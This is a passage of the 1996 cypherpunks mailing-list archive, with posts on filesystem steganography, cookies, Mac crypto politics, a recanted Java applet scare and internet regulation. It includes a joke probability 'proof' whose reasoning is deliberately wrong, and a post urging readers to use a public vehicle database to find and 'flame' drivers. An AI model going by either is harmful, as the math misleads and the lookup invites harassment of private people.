-----8<-------

According to your friendly neighbourhood statistician (ie me) the answer can be
deterined as follows:

Suppose we have 20 beautiful women and we call them W1, W2 through to W20.  For
any given women, say Wi where 1<=i<=20, we have only two choices, choosing her
or rejecting her.  Knowing that she's beautiful anyway, we assume that:

Probability(Choosing Wi)=Probability(Rejecting Wi)=0.5

Now, let Wn where 1<=n<=20 be the most beautiful woman, then the probability of
getting the most beautiful woman is:

Probability(Getting Wn)
        =Probability(Rejecting W1) * Probability(Rejecting W2) *
                Probability(Rejecting W3) * ... * Probability(Rejecting Wn-1) *
                Probability(Choosing Wn)
        =(0.5)^(n-1) * (0.5)
        =(0.5)^n

Now we know that the value for a fraction raised to any of the valid values of n
(defined above to be 1<=n<=20) can be maximised by minimising the power to which
the fraction is raised.  So we take the minimum possible value of n, namely n=1.

Thus Probability(Getting Wn)=(0.5)^n=0.5.  This gives us the highest chance of
choosing the most beautiful woman.

This could have been done more intuitively and less rigorously by considering
the fact that when we multiply any fraction by another fraction, it always
becomes a smaller fraction (and hence our probability is reduced).

So you can see there is a moral in this story, can you not?

I pat myself on the head.  I am extremely brilliant.

She who is most luscious
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Internet Consultant, Professional Cynic
Author: Australian Beginner's Guide to the Internet (2nd Ed.)
	Australian Business Guide to the Internet
	Internet Guide for Teachers, Students & Parents
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 7 Aug 1996 19:25:10 +0800
To: root@hellspawn.Berkeley.EDU (Damien Lucifer)
Subject: Re: Fixes to loop.c et al. for DES,IDEA,stego now done
In-Reply-To: <Pine.LNX.3.91.890918054255.204A-100000@HellSpawn>
Message-ID: <199608070806.SAA26988@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > This directory contains patches to the Linux kernel to enable encryption and
> > steganography of filesystems. Encryption allows you to have a scrambled
> > partition or file that, with the proper pass phrase, you can mount, just
> > like a normal filesystem. Steganography allows you to hide a filesystem in
> > the low bits of, say, an audio file. You can even combine these two to hide
> > a scrambled filesystem in the low bits of an audio file (see the example,
> > below).
> 
> 
> 
> With the addition of stego, this arrangment seems to be rather similar to 
> CFS.  So the question on my mind, is can the loop device(s) be 

Since when has CFS had any steganography features?

--
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carlos L. Mariscal" <clopez@nayar.uan.mx>
Date: Thu, 8 Aug 1996 02:52:08 +0800
To: Michael Cortes <lspeidel@earthlink.net>
Subject: Re: THE WORLD IS SCREWD UP
In-Reply-To: <3207C10E.60AF@earthlink.net>
Message-ID: <Pine.SUN.3.91.960807084034.3785A-100000@nayar.uan.mx>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Aug 1996, Michael Cortes wrote:

> THIS WORLD IS SREWED UP i hate my life so mue hobbeys makeing time pipe 
> bommbs so what is this all about huh what the fuck "anti terrisiom bill" 
> damn sad ok so what does  this mean FREE COUNTRY hahahaha i laugh when i 
> hear that term there is no free country and we never have a wright to 
> privesy u know man this sux so much....... oh and to the government u can 
> kiss my ass
> 
	Ok, I get your point. BTW, ever heard about punctuation?

		clopez	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Thu, 8 Aug 1996 04:33:50 +0800
To: alano@teleport.com
Subject: Re: Cookies on Microsoft Explorer?
Message-ID: <199608071547.IAA07691@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: alano@teleport.com, cypherpunks@toad.com
Date: Wed Aug 07 10:46:25 1996
> At 09:14 AM 8/6/96 -0700, David.K.Merriman.-.webmaster@cygnus.com,
>  wrote:
> 
> >I have IE3 configured to ask me for permission to accept a cookie. Yes,
> >some sites send (n!)+1 cookies during a session. If they send too many,
>  I 
> >personally move on to another site, after sending them email (!).
> 
> If the site sends you *LOTS* of cookies with no expire date, then they
>  have
> probibly compiled their Apache server with the mod_cookie module.  The
> cookies are only used by the log files and i am willing to bet that
>  most
> people who have that option compiled in do not even read the logs.

Whatever the conditions/causes for the cookiefest, I make it known to them 
that the volume of cookies gives me electronic diabetes, and move on. I 
suspect that there will eventually be enough people that dislike being 
force-fed cookies and complaining about it that such sites will either 
fold, or get a klew.

Dave

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome and encouraged. Visit my web site at
         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq
YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5
LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR
tBg8bWVycmltYW5AYW1hb25saW5lLmNvbT60KURhdmlkIEsuIE1lcnJpbWFuIDxt
ZXJyaW1hbkBtZXRyb25ldC5jb20+iQCVAwUQLqwCX5IDOImWiDcFAQHFfwP/Tm5v
3zoijU9oYmAO1WVsw4+HamN0HdBKkDxPtuGeCmxNuiDPsucVjqctMfbh1WzCfNEb
NfZdg3YVdDNgsQqlu4k8XznrbQSoQm3t5ySQNKvQx0KisJnee0caVpEgQ4bwSfuv
81TG08lJt4A0fIpXSllMnRkXenvXIBmgJTUklaiJAJUDBRAupxG0qWOYkEirxV0B
AUUJBACJ0FYXTlR9ncd0tNnYGOGSLO1scgt8IxUDMyQ2htEsfSNxD6jg303LuAA/
Zset5p0JhACLLHbgtZlpYH4uQbjy9Ve9JrVm/6SysSnX1TfSNF5NoMcxGDYgNDRL
tP/5jKRZ/hzH8vjHSWXnnN9Pb1MdYdWql4DjDQ+dIEm5sywbqIkAlQIFEC3uaE3F
a078mDswGQEBbI8D/0FiwDcbfeNyDVJ+7EIWHjIxVkIGu+ArYUEllR3GSBHVZ9Vh
7n8bNXeNHMnG5cZ23TLMVvweyhxFS+cDi+I7omeDNr6x65z500LxfUvLK5bSuSiB
VkTp2z+/iojY/662JwKHzEEunuJ4CO8Yhxy11CdeszEX7DpXzRxLL92rEmO2
=QZRc
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMggDg8VrTvyYOzAZAQE6cQP+JE18wLLTHDsmId+zFHh3Q5x7wA2oyS3/
7FWxE5zWGipUxNT/tlRF/jdinMoLkg27Q7iQ1uoI4TDa5VE9pV6uGilCHN2naM0y
A9Tvebxr/pHUj+hr0jYUCWzY6VQ2+q5icG11DHm3/iXhAF1SJHJJj2xi9zx4PRCv
zINv8AXkFmg=
=ps5w
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Thu, 8 Aug 1996 04:35:43 +0800
To: accessnt@ozemail.com.au
Subject: Re: The Solution: 20 Beautiful women
Message-ID: <199608071547.IAA07707@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: accessnt@ozemail.com.au, cypherpunks@toad.com
Date: Wed Aug 07 10:46:46 1996

> I pat myself on the head.  I am extremely brilliant.
> 

Modest, too :-)

> She who is most luscious
> ___
> Mark Neely - accessnt@ozemail.com.au 
> Lawyer, Internet Consultant, Professional Cynic
> Author: Australian Beginner's Guide to the Internet (2nd Ed.)
>       Australian Business Guide to the Internet
>       Internet Guide for Teachers, Students & Parents
> WWW: http://www.ozemail.com.au/~accessnt
> 
> 

Dave Merriman
"I am not conceited. Conceit is a downfall, and I have none."

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome and encouraged. Visit my web site at
         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq
YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5
LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR
tBg8bWVycmltYW5AYW1hb25saW5lLmNvbT60KURhdmlkIEsuIE1lcnJpbWFuIDxt
ZXJyaW1hbkBtZXRyb25ldC5jb20+iQCVAwUQLqwCX5IDOImWiDcFAQHFfwP/Tm5v
3zoijU9oYmAO1WVsw4+HamN0HdBKkDxPtuGeCmxNuiDPsucVjqctMfbh1WzCfNEb
NfZdg3YVdDNgsQqlu4k8XznrbQSoQm3t5ySQNKvQx0KisJnee0caVpEgQ4bwSfuv
81TG08lJt4A0fIpXSllMnRkXenvXIBmgJTUklaiJAJUDBRAupxG0qWOYkEirxV0B
AUUJBACJ0FYXTlR9ncd0tNnYGOGSLO1scgt8IxUDMyQ2htEsfSNxD6jg303LuAA/
Zset5p0JhACLLHbgtZlpYH4uQbjy9Ve9JrVm/6SysSnX1TfSNF5NoMcxGDYgNDRL
tP/5jKRZ/hzH8vjHSWXnnN9Pb1MdYdWql4DjDQ+dIEm5sywbqIkAlQIFEC3uaE3F
a078mDswGQEBbI8D/0FiwDcbfeNyDVJ+7EIWHjIxVkIGu+ArYUEllR3GSBHVZ9Vh
7n8bNXeNHMnG5cZ23TLMVvweyhxFS+cDi+I7omeDNr6x65z500LxfUvLK5bSuSiB
VkTp2z+/iojY/662JwKHzEEunuJ4CO8Yhxy11CdeszEX7DpXzRxLL92rEmO2
=QZRc
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMggDmMVrTvyYOzAZAQFIRgP/daZBRoJrHSGHFgUR3s5ofjrhF49yp3Wh
OxyhrjZ1oPFCz1n7Nzii18JXFlaCCRzppgBYcr6/t777bhHVs3PeLpQNHW5q4xLD
U+mOo9J0UF1TMVcAiYD9b4wVlLlcU+qa0PVYcuRLw3QbWd3g7eqABKpwKWyWibI4
CVUttLIzwX4=
=yCpo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Thu, 8 Aug 1996 08:51:13 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <v03007803ae2e770bd71e@[204.179.128.38]>
MIME-Version: 1.0
Content-Type: text/plain


Man,
 you guys have way, WAY to much time on your hands. CP is starting to sound
more like a bunch of bickering old ladies than the usual bickering group of
old ladies (uh I mean crytpo anarchists) . I would have responded and put a
round through the head of this discussion a few days ago, but my digest
feed to cp died a few days ago.

Since all this  crap seems to center around a conversation between me and
Tim , and really should have stayed that way, (Bob, consider this a rap on
the nose with a rolled up newspaper) lets just clear up a few points nad
then please move on to the next subject.

By developer demand I am hosting a technical workshop for Mac Crypto
developers <http://webstuff.apple.com/~opentpt/crypto.html> and asked Tim
if he would like to speak, I though that since he has so much interesting
stuff to say on the net that he might want to share it with some folks who
write code for a living.

Tim declined. no problem, normaly that would have ended it there, but Tim
went on to state that I excluded him from the Mac Crypto list, I replied
that I did no such thing and that I inherited the list (and hence any guilt
I guess), He went on further deriding the Mac.

I have been on the net long enough to no longer care about religious wars
about "how long who's pull down menu was", BUT, I belive that Tim was a bit
out of line with some of his comments about Mac Developers and Apple
employees. I have a problem with that. We emailed a bit and came to the
agreement that Tim would not be an appropriate speaker for a Mac technical
workshop. fine, end of story,lets move on.

But then Bob comes along and does his rant, the point was not so much to
pick on Tim, which I belive he didnt name, but more to point out why the
Mac is an important platform for crypto. Tim reacted and the pissing
started. Lets just end it now. I am sure you all have better things to do.

What I am concerned with is that in all the noise the following points are
being lost in the fog of war.

1) there a a LOT of Mac clients on the Net. windoze might be popular in the
corporate office, but Macs are still easier to configure (prove me wrong),
and hence do have a place in this world.

1a) The Mac also has one of the best networking environment available for
the desktop platform, OpenTransport IS very fast. And do me a favor dont
complain about opendoc until youve tryed and write code with OLE.

2) Apple is nowhere near dead, anyone who says this is either smoking
something harsh or lives in media painted world. The same people that say
Macs are dead are the same uneducated liberal buttheads who write in the
San Jose Merc Pravda about how a disarmed populus is a free(h)er one.

3) If you want strong crypto to get to the masses then you better start
paying attention to genetic deversity or as I like to call it Watership
Down syndrome, If you put all your crypto eggs in Bill's basket then don't
complain when you find that the MicroSoft CAPI only supports escrowed keys.

so lets all grow a little thicker skin and move on with it. while you all
piss and moan, your rights are being stolen away, If you want to help
crypto suceed then you have to care about Macs, just as much as windoze or
Sun or Be or whatever platform.

Back to work.





Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 8 Aug 1996 03:00:47 +0800
To: schryver@radiks.net (Scott Schryvers)
Subject: Re: your mail
In-Reply-To: <199608071019.FAA15721@sr.radiks.net>
Message-ID: <199608071423.JAA24819@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Scott Schryvers wrote:
> 
> NBC News at Sunrise has just announced the discovery of alien life on the 
> planet Mars.  The lifeform that became extinct more than 2 billion years
> ago was found as a fossil in a meteor that originated from mars and landed
> on earth.  The fossil found was a primitive germ life form.

did these life forms use cryptography?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 8 Aug 1996 07:15:08 +0800
To: cypherpunks@toad.com
Subject: Wee Beasties on Mars
In-Reply-To: <199608071442.KAA02713@nrk.com>
Message-ID: <199608071634.JAA06580@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> schryver@radiks.net:

> > NBC News at Sunrise has just announced the discovery of alien life on the 
> > planet Mars.  The lifeform that became extinct more than 2 billion years
> > ago was found as a fossil in a meteor that originated from mars and landed
> > on earth.  The fossil found was a primitive germ life form.

NASA is holding a news conference today to discuss the find.  I must 
admit I am curious as to how they determined the meteor's origin.  
Most material in the solar system is similar in composition.  

Definitely a news story worth following, however. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 8 Aug 1996 01:59:37 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Internal Passports
In-Reply-To: <199608070259.TAA17424@toad.com>
Message-ID: <199608071335.JAA02403@nrk.com>
MIME-Version: 1.0
Content-Type: text


> If you're _employing_ Anglos, you're currently required to disrespect their
> honesty and demand proof that their papers are in order to fill out the I-9
> form.

At one time, I worked in a position requiring all kinds of
clearances - TS, SCI, {xxx} etc.

We hired a bunch of new engineers. They'd all been through the
wringer before we brought them on board. This takes 6 months or
so; Full Field Investigation, etc.......

They showed up all ready to work for Uncle Sam.  The very first
form they encountered was the I9 "Prove you are a citizen..."

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Aug 1996 08:24:58 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <ae2e146d0002100492fe@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:15 PM 8/7/96, Vinnie Moscaritolo wrote:
>Man,
> you guys have way, WAY to much time on your hands. CP is starting to sound
>more like a bunch of bickering old ladies than the usual bickering group of
>old ladies (uh I mean crytpo anarchists) . I would have responded and put a
>round through the head of this discussion a few days ago, but my digest
>feed to cp died a few days ago.

"Put a round through the head of this discussion"?

One of the most common conceits on this list is summarized by this comment:
"I've said what I want to say, so now it's time for us to move on to other
things."

Or the charming equivalent: "You've heard my views, now can't we move on to
some _real_ cryptography?"

And then there's the old chestnut of claiming others have too much time on
their hands.

Learn to use the "delete" key for discussions you don't like.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Thu, 8 Aug 1996 02:10:42 +0800
To: cypherpunks@toad.com
Subject: ****Developer Recants Hostile Java Applet Story 08/06/96
Message-ID: <9608071339.AA16478@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
SAN FRANCISCO, CALIFORNIA, U.S.A., 1996 AUG 6 (NB) --  
By Patrick McKenna. Finjan Software of Israel, which earlier said its 
Java security software detected what the company called a publicly 
available hostile Java applet at a game site on the World Wide Web, 
has issued a statement changing its earlier claims. 

In the first story on the Java applet labeled "hostile" by Finjan,  
Newsbytes reported early Tuesday that the Java applet in question is 
part of a game available on the Web and connected to America Online. 
Shmulik Suhami, spokesperson for Finjan, told Newsbytes at the time, 
"We were contacted by one of our users who detected a hostile Java 
applet and we have confirmed the user's experience." 

Newsbytes reported Sun Microsystems' JavaSoft division reply as saying,  
"This issue is totally and completely bogus. Security features built 
into Java do not allow an applet to read or write to another computer 
without issuing a warning message and this applet in question is not a 
hostile Java applet. An individual at AT&T, acting independently of the 
company, developed the applet. We suspect a file for the applet was 
placed on a second system and that is probably why Finjan's software 
incorrectly read it as a hostile application. Actually, this is a flaw 
in Finjan's software. There is no bug or hostile application at all." 

In its early story, Newsbytes also quoted a JavaSoft spokesperson  
as saying, "What is going on is that the person's applet called an 
audio file from a second machine and Java's security features are so 
strong and restrictive that an exception is raised whenever a second 
machine is called. Finjan's software appears to have read the call to 
the second machine as a hostile bug." 

In recanting its initial claims, Finjan released the following  
statement: "We want to issue a clarification on the media alert we sent 
out yesterday describing a potentially suspicious Java applet. We were 
perhaps mistaken to describe the applet discovered as a 'hostile 
applet,' since we did not know if it did anything damaging to a 
person's system. The activity of applet described was harmless. We 
misunderstood the extent of the security exception based on information 
we received. Though in principal the way the app was created could 
constitute a risk, in practice this was a relatively harmless breech 
of security, which the Java Security Manager dealt with appropriately." 

(19960805/Press Contact: Mary Jo Wagner, Successful Marketing  
Strategists,  tel 510-644-3837; E-mail Address: maryjo@successful.com; 
or Paul Karr, KVO, 415-961-1550) 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 8 Aug 1996 01:51:19 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Censorship through proxy
In-Reply-To: <2.2.32.19960807101315.0091e068@panix.com>
Message-ID: <rogern307ntie.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Duncan" == Duncan Frissell <frissell@panix.com> writes:

  > "Your government -- just a rouge sysadmin."
                               ^^^^^
No, no -- that would be *China*, not Singapore ;-)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Aug 1996 08:42:26 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Digital Telephony costs $2
Message-ID: <199608071650.JAA05697@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 8/6/96 -0700, Bill Stewart wrote:
>At 11:34 PM 8/5/96 -0800, you wrote:
>>What is unclear, however, is WHY they "had to" build a card that couldn't do 
>>full-duplex.  I mean, would there have been a problem implementing that?  Or 
>>was this just another one of those stupid design decisions which could have 
>>been easily fixed if it had been realized in time?

>2) DSPs tend to be really tight on resources, especially RAM,
>   which you need to do multiple programs at once.  $5-10 DSPs are 
>   especially tight.  They're starting to come with mini operating systems.

I wasn't aware that sound cards made appreciable use of DSP's.  Unlike 
modems, which inherently must massage large amounts of signal to get the 
data, I assumed that sound cards were more like straight A/D/A systems.



>>> It also has the advantage
>>>that the data is being moved through your CPU, so encryption is
>>>an easy add-on, rather than having one combined modem/voiceblaster
>>>card which doesn't have any hooks for crypto or other processing.
>>Well, I assume that if implemented as a new type of modem card, the 
>>processor can be used to do the data transfer.
>
>If you're doing the voice crunching and A/D conversion and telephony
>all on the modem card, with everything tightly integrated
>to fit in your tiny cache, why put in hooks for the processor to intervene?

You'd put in a hook because it would be easily done, and to fail to do so 
would be a serious mistake.  It could also be bypassed by a hardware switch, 
I suppose, or a software-controlled switch, to make processor intervention 
unnecessary.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 8 Aug 1996 08:41:23 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: STEGO GUNS
Message-ID: <Pine.SUN.3.91.960807101421.20235A-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The following is from USA Today of last Friday:

	In a comprehensive study that may reshape the 
	gun control debate, researchers have found that 
	letting people carry concealed guns appears to
	sharply reduce killings, rapes and other violent
	crimes.

	The nationwide study [from the University of
	Chicago] found that violent crime fell after
	states made it legal to carry concealed handguns:
	*   Homicide, down 8.5%.
	*   Rape, down 5%.
	*   Aggravated assault, down 7%.
	...
	The drop isn't primarily caused by people 
	defending themselves with guns, says John Lott,
	the study's author.  Rather, criminals seem to 
	alter their behavior to avoid coming into contact
	with a person who might have a gun.

The official release of the study is scheduled for tomorrow.  
The study took two years and was peer reviewed.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 8 Aug 1996 03:26:31 +0800
To: cypherpunks@toad.com
Subject: Message
Message-ID: <9608071435.AA11662@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


http://upside.master.com:8080/print/july96/ww9607.html


w a s h i n g t o n   w a t c h

The Coming Internet Wars

Michael C. Maibach

There's a very real danger that for the first time both the PC and the Internet will be 
regulated and taxed. The PC industry policy landscape has never been so dynamic, as 
telecom deregulation and technology convergence take hold. Being on the cutting edge of 
technology places us at the leading edge of public policy. Here's what's coming.

In Washington
A group of U.S. long-distance resellers has petitioned the Federal Communications 
Commission to outlaw (yes, outlaw) Internet telephony software. Their view is that the 
unregulated Net should not compete with regulated carriers. The PC industry's position is 
that the FCC doesn't have the authority to outlaw this or any software. A much more 
significant threat is a possible RBOC petition asking the FCC to levy access charges on 
all "enhanced services," such as the Internet. They seem to object to ISPs moving data, 
e-mail, graphics and calls outside of the current "universal service" monopoly established 
by the 1934 Communications Act.

The PC industry's number one telecom goal is competition in the local loop. Such 
competition should drive more bandwidth at a lower cost. Only the Net offers a 
modicum of competition to local service. If the FCC pulls the Net into the archaic 
telecom regulatory system, access charges could chill use of the most important telecom 
medium in the world.

The FCC must also set advanced digital TV broadcast standards. As TVs move into the 
digital PC world, let's make sure that broadcast signals over public airwaves are both 
PC- and TV-compatible.

And speaking of consumer electronics, digital videodiscs (DVDs), with 10 times the 
capacity of a CD-ROM and studio-quality output, are on the way. The motion picture 
and consumer electronics industries drafted legislation to protect content while enabling 
this new market. Unfortunately, their bill would inadvertently outlaw PCs as illegal copy 
devices! PC hardware and software makers have a vested interest in the success of 
DVD technology because it allows the copying of data and images. We, perhaps more 
than any other industry, want DVD technology to advance. But legal protections and 
private standards must make this a technology as open to PC users as it is to movie 
buffs.

Finally, Washington is considering measures to strengthen copyright protection of 
material moved on the Internet, require closed captioning on PCs that pick up TV 
broadcast signals and forbid software exports that have strong encryption protections in 
the name of national security. An industry that has grown up with private standard-setting 
in an open, unregulated environment now faces the kind of intense regulatory pressures 
one is accustomed to seeing in the railroad or drug industries. This is spurred on by the 
convergence of FCC-regulated industries with PC markets, products and technologies.

In State Capitals
Action in many U.S. state capitals reflects themes developing in Washington. 
Long-distance resellers have asked state public utility commissions (PUCs) to outlaw 
Internet telephony software, for example. Florida and California are considering taxing 
"digital commerce" they fear may bypass state sales tax regimes. And a few RBOCs 
have actually petitioned state PUCs to allow increases in ISDN installation and usage 
fees. Members of the PC industry, working with consumer groups and Internet warriors, 
have successfully challenged such rate hikes. Lower ISDN prices and easier hookup 
should drive huge volume increases in this market, benefiting local phone companies and 
PC users.

Around the World
So far, activity abroad is less robust than in the U.S., but it's just a matter of time. The 
European Union recently reclassified PCs with CD-ROM drives as "consumer 
electronics devices," tripling their import tariffs. Moreover, Europe is considering a "TV 
without borders" policy that would impose domestic content requirements on TV 
programming. Since movies are a type of software, will proposals to limit the sale of 
"foreign" PC software follow? And governments in Europe, Canada and Australia are 
considering a "bit tax" on digital commerce.

The old world of analog TV and telecom regulation must not spill over into the new 
world of competitive, open and digital markets. Governments must adopt the PC model 
of innovation and govern accordingly. In the U.S., the FCC must evolve into a Federal 
Competition Commission, and Congress should carefully guard digital commerce 
technologies that are changing the way we work, learn, consume and communicate.

Michael C. Maibach is vice president for government affairs at Intel Corp. in 
Washington, D.C.
----------------------------------------------------------------------

Home | Upside Magazine | Entrepreneur Forum | Upside Locator | About Upside

Comments and suggestions for this site are welcome via e-mail to: feedback@upside.com

Copyright (c)1996 Upside Publishing Company. All rights reserved.
Powered by Thunderstone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 8 Aug 1996 03:07:54 +0800
To: schryver@radiks.net (Scott Schryvers)
Subject: Re: your mail
In-Reply-To: <199608071019.FAA15721@sr.radiks.net>
Message-ID: <199608071442.KAA02713@nrk.com>
MIME-Version: 1.0
Content-Type: text


schryver@radiks.net:

> NBC News at Sunrise has just announced the discovery of alien life on the 
> planet Mars.  The lifeform that became extinct more than 2 billion years
> ago was found as a fossil in a meteor that originated from mars and landed
> on earth.  The fossil found was a primitive germ life form.

Sternlight?



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 8 Aug 1996 07:17:05 +0800
To: (Recipient list suppressed)
Subject: Oregen Vehicle Database on the Net
Message-ID: <2.2.32.19960807175027.002beffc@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Aaron Nabil has purchased the entire Oregen Vehicle Registration database
($220) and put it on the Web. Did some oregonian piss you off on the
highway? snail flame their arse!

http://www.spiritone.com/cgi-bin/plates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Thu, 8 Aug 1996 04:47:19 +0800
To: cypherpunks@toad.com
Subject: cookie monster
Message-ID: <199608071600.LAA03014@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


        Does anybody have any information on the "Cookie Monster" technology
that Netscape and Microsoft are soon going to incorperate in their internet
browsers?  All I know is that they take cookies and "eat" (destroy) them.  
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 8 Aug 1996 03:26:03 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now
In-Reply-To: <199608070259.TAA17442@toad.com>
Message-ID: <199608071504.LAA02808@nrk.com>
MIME-Version: 1.0
Content-Type: text


